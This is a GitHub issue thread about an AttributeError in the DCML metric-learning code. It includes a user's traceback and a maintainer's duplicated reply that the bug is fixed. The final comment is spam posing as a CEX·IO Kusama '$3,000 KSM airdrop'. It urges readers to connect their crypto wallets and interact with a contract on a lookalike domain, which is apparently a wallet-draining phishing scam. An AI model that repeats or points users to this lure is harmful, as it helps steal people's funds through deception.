### ISSUE TITLE
AttributeError: module 'batchminer' has no attribute 'BATCHMINING_METHODS'

### ISSUE THREAD

**Issue by JonasZero** [wzzheng/DCML#1]
This error occurs when I run the following code：
`python main.py --dataset cub200 --tau 55 --gamma 0.2 --gpu 0 --seed 0 --compos_num 4 --ensemble_num 4 --embed_dim 128 --bs 100 --n_epochs 300 --samples_per_class 2 --loss margin --batch_mining distance --arch resent50_frozen_normalize`

Traceback (most recent call last):
  File "main.py", line 108, in <module>
    import criteria as criteria
  File "/home/disk/github/DCML-main/criteria/__init__.py", line 1, in <module>
    from criteria import triplet, margin, proxynca, npair
  File "/home/disk/github/DCML-main/criteria/triplet.py", line 6, in <module>
    ALLOWED_MINING_OPS  = list(batchminer.BATCHMINING_METHODS.keys())
AttributeError: module 'batchminer' has no attribute 'BATCHMINING_METHODS'

**Comment by wangck20** [comment]
Sorry for late reply. We have made the correction of the code. The error will not occur again. Thanks for your question.

**Comment by wangck20** [comment]
Sorry for late reply. We have made the correction of the code. The error will not occur again. Thanks for your question.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
